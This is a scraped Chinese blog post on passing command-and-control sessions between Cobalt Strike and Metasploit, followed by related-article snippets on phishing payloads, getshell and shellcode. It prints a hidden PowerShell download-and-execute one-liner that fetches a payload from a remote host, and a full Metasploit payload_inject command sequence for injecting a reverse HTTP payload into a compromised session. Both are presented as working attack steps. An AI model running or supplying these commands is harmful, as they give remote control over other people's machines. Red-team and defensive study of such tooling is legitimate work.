<menu id="guoca"></menu>
<nav id="guoca"></nav><xmp id="guoca">
  • <xmp id="guoca">
  • <nav id="guoca"><code id="guoca"></code></nav>
  • <nav id="guoca"><code id="guoca"></code></nav>

    CobaltStrike與MSF聯動

    VSole2021-11-18 07:52:49

    CobalStrike更適合做個穩控平臺,輕型的遠控工具,內置Windows系統類模塊較多,Metasploit更擅長各類內網搜集和漏洞利用,包含多類型操作系統模塊,但是使用起來“比較笨重”。

    CS反彈meterpreter到MSF

    首先我們需要在msf中設置監聽payload選擇reverse_http,設置好本機的IP地址為192.168.80.129,端口為9998。

    在CobaltStrike中點擊Listener,設置名字可任意設置,Payload為Foreign HTTP,HTTP Host主機ip地址為192.168.80.129, HTTP Port端口為9998

    在已生成的beacon shell中,右鍵選擇Spawn;

    然后選擇剛剛設定的那個名字,payload為 windows/foreign/reverse_http,然后點擊Choose;

    可以看到成功的由CS反彈meterpreter到MSF

    MSF反彈Beacon shell到CS

    這里在CS中利用Attacks-> Web Drive-by -> Scripted Web Delivery 來部署一個Payload分發站點:

    powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://192.168.80.129:80/a'))"
    

    在meterpreter中執行上面的powershell語句,可以成功反彈到CS

    也可以在獲得meterpreter會話后,利用MSF注入功能,加載CS的payload

    #進入payload_inject模塊msf>use exploit/windows/local/payload_inject#根據CS監聽器類型選擇對應的payload(http或者https)msf>set payload windows/meterpreter/reverse_http#設置回連地址(CS監聽器地址)msf>set LHOST CS_IPmsf>set LPORT CS_PORT#指定要執行的meterpreter會話msf>set session meterpreter會話ID#設置MSF不啟動監聽(不然的話msf會提示執行成功,但沒有會話建立,同時CS也不會接收到會話)msf>set disablepayloadhandler truemsf>run
    

    payloadmsf
    本作品采用《CC 協議》,轉載必須注明作者和本文鏈接
    MSF生成payload并放到靶機能夠訪問的服務器上,攻擊者通過釣魚等方式使靶機執行powershell代碼,靶機反彈到msf監聽的端口上建立會話,由此攻擊者可以利用此會話完成攻擊控制靶機。
    metasploit淺析
    2023-05-30 09:07:26
    # Available formats are :process_image, :dylib, :dylib_sha1 and :exec. # 替換對應位置內容,查詢知應為rdata區。然后調用payload_generator中的format_payload得到最終的payload可執行程序。其完整內容如下: "\x31\xdb" + # xor ebx,ebx
    記一次網站滲透過程
    2022-09-13 08:37:27
    前幾天記錄某一次無意點開的一個小網站的滲透過程,幸運的是搭建平臺是phpstudy,cms是beecms,beecms有通用漏洞,然后去網上找了資料,成功getshell并獲取服務器權限。
    一、序言 記錄某一次無意點開的一個小網站的滲透過程,幸運的是搭建平臺是phpstudy,cms是beecms,beecms有通用漏洞,然后去網上找了資料,成功getshell并獲取服務器權限。 二、滲透過程 1. 無意點開一個網站,發現網站比較小,且看起來比較老,然后發現logo沒有改,于是乎去百度搜索這個cms,發現有通用漏洞,這里貼一個鏈接:Beecms 通用漏洞(https://lin
    docker run -it -d -p 13443:3443 -p 8834:8834 leishianquan/awvs-nessus:v1. 如XSS,XSRF,sql注入,代碼執行,命令執行,越權訪問,目錄讀取,任意文件讀取,下載,文件包含,遠程命令執行,弱口令,上傳,編輯器漏洞,暴力破解等驗證碼與郵箱以及token的返回泄露,以及后臺為校驗從而可刪除的參數。從某個成功請求中捕獲數據包觀察cookie或者token是否存在規律或加密。token的key參數解密構建獲取真實user密鑰,可拼接、規律、時間戳……winodws桌面:TeamViewerQS單文件windows下載文件;certutil -urlcache -split -f?
    概述滲透測試的目標可以是單個主機,也可以是整個內網。在實戰中,比如最近如火如荼的HW行動,更多的是對一個目標的內網進行滲透,爭取獲得所有有價值的資產。完整的內網滲透涉及的步驟如下圖所示。快速橫向移動到到內網中的核心資產,獲取核心敏感數據和權限,完成一次疼痛的打擊。Step 1 信息收集完成邊界突破的第一步是目標對象資產的信息收集。這些其實是為了找到脆弱資產進行攻擊,畢竟“柿子挑軟的捏”。
    在實戰中,比如最近如火如荼的HW行動,更多的是對一個目標的內網進行滲透,爭取獲得所有有價值的資產。快速橫向移動到到內網中的核心資產,獲取核心敏感數據和權限,完成一次疼痛的打擊。這些其實是為了找到脆弱資產進行攻擊,畢竟“柿子挑軟的捏”。
    內網滲透-代理篇
    2021-12-01 05:44:01
    利用代理工具將內網的流量代理到本地進行訪問,這樣就可以對內網進行下一步滲透,同時也可以利用代理工具將其他網段的流量轉發到本地進行縱向滲透。代理的本質是Socks協議(防火墻安全會話轉換協議),工作在OSI參考模型的第5層(會話層)。使用TCP協議傳輸數據,因而不提供如傳遞ICMP信息之類的網絡層相關服務。目前支持SOCKS4和SOCKS5兩個版本:
    VSole
    網絡安全專家
      亚洲 欧美 自拍 唯美 另类